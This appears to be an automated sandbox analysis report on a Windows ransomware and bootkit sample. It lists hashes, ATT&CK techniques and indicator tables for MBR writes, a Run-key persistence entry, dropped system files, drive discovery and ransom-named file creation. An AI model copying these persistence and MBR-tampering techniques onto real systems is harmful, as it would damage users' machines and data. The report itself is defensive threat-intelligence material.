8b0f9d248e67199bb7f1a778a03e4caee7d267e61d8a7d70fa1c1f6d7944e96a

Resubmissions

28/03/2025, 16:52

250328-vdc6kazry9 9

24/03/2025, 22:22

250324-2aphra1jx7 10

Analysis

max time kernel
147s
max time network
128s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
28/03/2025, 16:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
Size

516KB
MD5

b2b0e6184b82144f65389d39f1eadd0d
SHA1

17311fb1fb33da5f303ae30ee7b4b60b80985d2e
SHA256

3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db
SHA512

d1abc2c74aa2bad9ac8a59c1552904e6d65717786ed7a193c4fcda23218371bcad0953848f1e1c5b9df50a86e2549c6da35c6e372366826dc25f042107a8babb
SSDEEP

12288:j3nZMhJ+ubNmzdCanVtkEY70mOpFRxd/GAXl0xtiNe96bgRO:j3nZqfbkzkcvElOpPj/DA2+6ERO

Score

8^/10

bootkit discovery persistence

Malware Config

Signatures

Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral15/files/0x0005000000019436-51.dat	acprotect

Executes dropped EXE 64 IoCs

pid	Process
2348	svschost.exe
1964	nsf.exe
476	svschost.exe
2884	nsf.exe
1776	svschost.exe
1040	svschost.exe
1784	svchost.exe
308	svchost.exe
1148	svschost.exe
2836	svchost.exe
1964	svchost.exe
2988	svchost.exe
2760	svchost.exe
2728	svchost.exe
2668	svchost.exe
2236	svchost.exe
1012	svchost.exe
588	svchost.exe
2932	svchost.exe
780	svchost.exe
2908	svchost.exe
2884	svchost.exe
2076	svchost.exe
956	svchost.exe
2164	svchost.exe
1152	svchost.exe
2152	svchost.exe
316	svchost.exe
808	svchost.exe
1280	svchost.exe
2148	svchost.exe
2564	svchost.exe
2936	svchost.exe
1076	svchost.exe
2020	svchost.exe
1752	svchost.exe
1860	svchost.exe
1264	svchost.exe
1416	svchost.exe
2344	svchost.exe
1740	svchost.exe
2420	svchost.exe
3056	svchost.exe
2404	svchost.exe
2052	svchost.exe
2800	svchost.exe
2472	svchost.exe
2784	svchost.exe
2780	svchost.exe
2636	svchost.exe
2692	svchost.exe
344	svchost.exe
2768	svchost.exe
2960	svchost.exe
532	svchost.exe
2932	svchost.exe
780	svchost.exe
1388	svchost.exe
1956	svchost.exe
768	svchost.exe
2368	svchost.exe
2256	svchost.exe
2112	svchost.exe
1564	svchost.exe

Loads dropped DLL 32 IoCs

pid	Process
1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
1964	nsf.exe
1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
2884	nsf.exe
1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
1040	svschost.exe
1040	svschost.exe
1040	svschost.exe
1040	svschost.exe
1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
1252	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\scrlk\\svchost.exe"	REG.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\L:	svschost.exe
File opened (read-only)	\??\Q:	svschost.exe
File opened (read-only)	\??\R:	svschost.exe
File opened (read-only)	\??\B:	svschost.exe
File opened (read-only)	\??\G:	svschost.exe
File opened (read-only)	\??\H:	svschost.exe
File opened (read-only)	\??\J:	svschost.exe
File opened (read-only)	\??\M:	svschost.exe
File opened (read-only)	\??\O:	svschost.exe
File opened (read-only)	\??\U:	svschost.exe
File opened (read-only)	\??\W:	svschost.exe
File opened (read-only)	\??\A:	svschost.exe
File opened (read-only)	\??\N:	svschost.exe
File opened (read-only)	\??\T:	svschost.exe
File opened (read-only)	\??\Y:	svschost.exe
File opened (read-only)	\??\Z:	svschost.exe
File opened (read-only)	\??\P:	svschost.exe
File opened (read-only)	\??\S:	svschost.exe
File opened (read-only)	\??\V:	svschost.exe
File opened (read-only)	\??\X:	svschost.exe
File opened (read-only)	\??\E:	svschost.exe
File opened (read-only)	\??\I:	svschost.exe
File opened (read-only)	\??\K:	svschost.exe

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	nsf.exe
File opened for modification	\??\PhysicalDrive0	nsf.exe

Drops file in System32 directory 17 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\nsf.exe	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File created	C:\Windows\SysWOW64\svschost.exe	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File created	C:\Windows\SysWOW64\cfwin32.dll	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File created	C:\Windows\SysWOW64\csrss64.dll	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File opened for modification	C:\Windows\SysWOW64\csrss64.dll	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File created	C:\Windows\SysWOW64\NoSafeMode.dll	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File opened for modification	C:\Windows\SysWOW64\NoSafeMode.dll	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File created	C:\Windows\SysWOW64\__tmp_rar_sfx_access_check_259441253	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File opened for modification	C:\Windows\SysWOW64\uwnmspwks.rrr	svschost.exe
File created	C:\Windows\SysWOW64\__tmp_rar_sfx_access_check_259431862	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File opened for modification	C:\Windows\SysWOW64\nsf.exe	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File opened for modification	C:\Windows\SysWOW64\svschost.exe	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File opened for modification	C:\Windows\SysWOW64\cfwin32.dll	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File created	C:\Windows\SysWOW64\csrss32.dll	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File opened for modification	C:\Windows\SysWOW64\csrss32.dll	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File created	C:\Windows\SysWOW64\default2.sfx	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe
File opened for modification	C:\Windows\SysWOW64\default2.sfx	3896f8a37034429e9784d767765d85ef6dcde105320568516fac4e31400514db.exe_.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\7-Zip\Lang\uz-cyrl.txt(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Origin.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\7-Zip\Lang\fur.txt(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-execution.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-heapwalker.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-remote.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiler.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341447.JPG(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-modules.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-tools.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101866.BMP(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382960.JPG(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099185.JPG(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0321179.JPG(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382970.JPG(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\7-Zip\Lang\ext.txt(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\7-Zip\Lang\pl.txt(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\7-Zip\Lang\si.txt(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-execution.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\7-Zip\Lang\tt.txt(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-output2.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-explorer.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-progress.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02746U.BMP(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jre7\bin\server\Xusage.txt(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0315580.JPG(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382938.JPG(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03224I.JPG(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-lookup.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-api-caching.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145361.JPG(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400005.PNG(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Grayscale.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-uihandler.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME.txt(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-loaders.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-autoupdate-ui.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-coredump.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\VideoLAN\VLC\NEWS.txt(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341534.JPG(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\7-Zip\Lang\zh-cn.txt(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\7-Zip\Lang\kk.txt(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-attach.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313896.JPG(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\DisableLock.xls(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\7-Zip\Lang\sw.txt(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\7-Zip\Lang\uk.txt(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309705.JPG(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\7-Zip\Lang\es.txt(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-plaf.xml(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe
File created	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148798.JPG(!! to decrypt email id 1759665594 to [email protected] !!).exe	svchost.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	\??\c:\windows\installer\{ac76ba86-7ad7-1033-7b44-a90000000001}\pdffile_8.ico	explorer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 20 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2728	PING.EXE
2612	PING.EXE
1152	PING.EXE
1840	PING.EXE
948	PING.EXE
2724	PING.EXE
2428	PING.EXE
2904	PING.EXE
2088	PING.EXE
2100	PING.EXE
1112	PING.EXE
1092	PING.EXE
1012	PING.EXE
2792	PING.EXE
1824	PING.EXE
2256	PING.EXE
3000	PING.EXE
2680	PING.EXE
2268	PING.EXE
2224	PING.EXE

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe

Runs ping.exe 1 TTPs 20 IoCs

Remote System Discovery

T1018

pid	Process
2680	PING.EXE
2088	PING.EXE
1012	PING.EXE
1112	PING.EXE
2428	PING.EXE
2256	PING.EXE
1840	PING.EXE
2224	PING.EXE
2268	PING.EXE
1824	PING.EXE
2100	PING.EXE
948	PING.EXE
1092	PING.EXE
3000	PING.EXE
2724	PING.EXE
2792	PING.EXE
1152	PING.EXE
2904	PING.EXE
2728	PING.EXE
2612	PING.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1996	explorer.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1996	explorer.exe
Token: SeShutdownPrivilege	1996	explorer.exe
Token: SeShutdownPrivilege	1996	explorer.exe
Token: SeShutdownPrivilege	1996	explorer.exe
Token: SeShutdownPrivilege	1996	explorer.exe
Token: SeShutdownPrivilege	1996	explorer.exe
Token: SeShutdownPrivilege	1996	explorer.exe
